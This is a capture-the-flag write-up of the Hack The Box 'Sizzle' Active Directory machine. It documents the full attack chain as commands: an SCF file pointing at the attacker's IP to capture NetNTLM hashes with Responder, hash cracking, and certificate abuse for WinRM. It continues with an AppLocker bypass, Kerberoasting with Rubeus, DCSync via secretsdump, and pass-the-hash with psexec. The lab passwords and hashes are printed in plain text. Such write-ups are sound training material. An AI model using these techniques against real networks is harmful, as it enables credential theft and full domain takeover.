Sizzle Write-up
I’ll start with some SMB access, use a .scf file to capture a users NetNTLM hash, and crack it to get creds. From there I can create a certificate for the user and then authenticate over WinRM. I’ll Kerberoast to get a second user, who is able to run the DCSync attack, leading to an admin shell.
Enumeration
Nmap Scan
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-06 20:06 PST
Stats: 0:04:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 49.58% done; ETC: 20:15 (0:04:41 remaining)
Nmap scan report for 10.10.10.103
Host is up (0.085s latency).
Not shown: 65506 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-12-07T04:32:13+00:00; -1s from scanner time.
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2024-12-07T04:32:13+00:00; 0s from scanner time.
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-07T04:32:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2024-12-07T04:32:13+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-07T04:32:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
| h2
|_ http/1.1
|_http-title: Not Found
|_ssl-date: 2024-12-07T04:32:13+00:00; 0s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49711/tcp open msrpc Microsoft Windows RPC
49728/tcp open msrpc Microsoft Windows RPC
49747/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-12-07T04:31:34
|_ start_date: 2024-12-07T03:45:57
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1558.64 seconds
Based from the nmap scan there is FTP with anonymous access and HTTP/HTTPS and smb and ldap. Lets start with FTP.
FTP Enumeration
In order to log into FTP anonymously we need to have the username and password set as anonymous. Once logged in there was nothing in the ftp server.
HTTP Enumeration
Viewing the http only shows up a gif image of a bacon and viewing the html source code shows nothing interesting.
I will run ffuf to scan for directories for further enumeration. I will first use the IIS.FUZZ.txt wordlist since we know it is running off from IIS server before running the usual directory-list-lowercase-2.3-medium.txt wordlist.
ffuf -w /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt:FUZZ -u http://10.10.10.103/FUZZ -t 1000 -e .php,.txt,.aspx,.asp
As we can see there are directories but it is forbidden and authorized. I checked the certsrv directory which required credentials.
This is as much as web enumeration I was able to gather lets move onto smb enumeration.
SMB Enumeration
I will use smbmap to view if we have smb anonymous access and to what shares do we have access to.
smbmap -u 'guest' -p '' -H 10.10.10.103
We have access to two shares which is the Department Shares and the IPC$ share. Lets view the contents from both shares with smbmap before manually enumerating the shares. This will list all the files and directories from the shares.
smbmap -u 'guest' -p '' -H 10.10.10.103 --depth 10 -r
Which there was nothing interesting files in any directory however there is a user directory which we may have access to upload a file. If we do have access to upload a file to someones directory we can perform a SCF file attack. The SCF file otherwise known as a Shell Command Files can be used to perform a limited set of operations such as showing the Windows desktop or opening a Windows explorer. We will make it where it will point to our ip and set up responder to be able to catch the ntlm hash.
Lets first see if we have any upload access to any users. We will write a basic one liner to connect to the share and upload a file and see if we are able to. First I will make a file called test.txt and that will be used to upload to a user. Next we will have to get all the usernames from the users directory and place it in a users.txt file.
Now lets run our one liner.
for users in $(cat users.txt); do smbclient -D "\Users" -N -c "prompt; cd $users; put test.txt; dir" "\\\\10.10.10.103\\Department Shares"; done
We can put test.txt in the Public user directory. It is worth a shot to see if we are able to get anything back. Lets make the SCF file. Name the file @file.scf
[Shell]
Command=2
IconFile=\\10.10.14.2\share\legit.ico
[Taskbar]
Command=ToggleDesktop
Set up responder before uploading the file.
sudo responder -I tun0
Then upload the file to users\Public share and wait for the hash.
Now we will try to attempt to crack the hash with hashcat.
hashcat hash /usr/share/wordlist/rockyou.txt
Which now we got our first user credentials.
We have new access such as CertEnroll directory. Lets check that out first.
Foothold
It does not seem much so lets try to log into winrm which gives us an error so lets try to log into the website of http://10.10.10.103/certsrv/
Providing the amanda credentials we manage to log in.
From here we can navigate into Request a certificate then advanced certificate request.
Once in this page. We can make a certificate via openssl and it will generate a certificate for us to use and put it in the saved request which will generate us a certificate as the user amanda. With that we are able to extract the key and pem and use it to log in via winrm as the user.
Let's first start by making the certificate.
openssl req -new -newkey rsa:2048 -nodes -keyout private.key -out request.csr
Leave everything blank and it should generate a private.key and a request.csr. Cat the request.csr and paste it into the saved request section.
As so and now click on submit. Click on base64 and download certificate.
Since we have the crt downloaded and we generated the certificate we have the private key. We can winrm with the certificate we downloaded and private key.
evil-winrm -S -i 10.10.10.103 -u amanda -p 'Ashare1972' -c certnew.cer -k private.key
As we can see we are logged in as amanda. I tried to upload some of my tools such as SharpHound however it does not upload.
We know we can upload files from the smb share so lets try that.
It uploaded successfully so lets now try to move the file onto the amanda’s directory.
move-item Rubeus.exe C:\Users\Amanda\
move-item SharpHound.exe C:\Users\Amanda\
Now I tried to run Rubeus.exe and SharpHound however they both are blocked
It is AppLocker at work. We can try to bypass AppLocker from this amazing list
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
Privilege Escalation
Moving the files to C:\Windows\temp and running the files worked!
Before running rebeus, lets check if it has port 88 running locally.
netstat -ap tcp
It does so now lets check for kerberoastable users.
.\Rebeus kerberoast /creduser:htb.local\amanda /credpassword:Ashare1972
Only one user hash. Lets try to crack the hash.
hashcat hash /usr/share/wordlist/rockyou.txt
We cracked the users password. Lets try to winrm as the user mrlky.
evil-winrm -i 10.10.10.103 -u mrlky -p 'Football#7'
It errors out hmmm lets try to run bloodhound and see what we can do.
bloodhound-python -c All -u 'mrlky' -p 'Football#7' -d 'htb.local' -ns 10.10.10.103 --zip
In bloodhound the user mrlky has dcsync rights to the domain controller which we can use to dump the hashes of the domain.
Lets dump the hashes of the domain and perform pass the hash on the administrator’s hash to log in.
secretsdump.py htb.local/mrlky:Football#7@10.10.10.103
Now lets try to winrm as administrator with the hash
evil-winrm -i 10.10.10.103 -u administrator -H f6b7160bfc91823792e0ac3a162c9267
I still get access denied which I found weird so just to make sure I ran netexec to see if I can log in via hash.
nxc smb 10.10.10.103 -u administrator -H aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267
It shows that I can log in as the user but winrm will not let me however there is another tool called psexec to gain a shell which is what I will use.
psexec.py administrator@10.10.10.103 -hashes aad3b435b51404eeaad3b435b51404ee:f6b7160bfc91823792e0ac3a162c9267
Conclusion
Sizzle was an incredibly challenging and rewarding box that pushed my pen testing skills to the limit. It required a deep understanding of Active Directory, advanced enumeration techniques, and creative problem-solving to identify and exploit vulnerabilities. Each step was a learning experience, from tackling unconventional footholds to navigating the intricate privilege escalation path.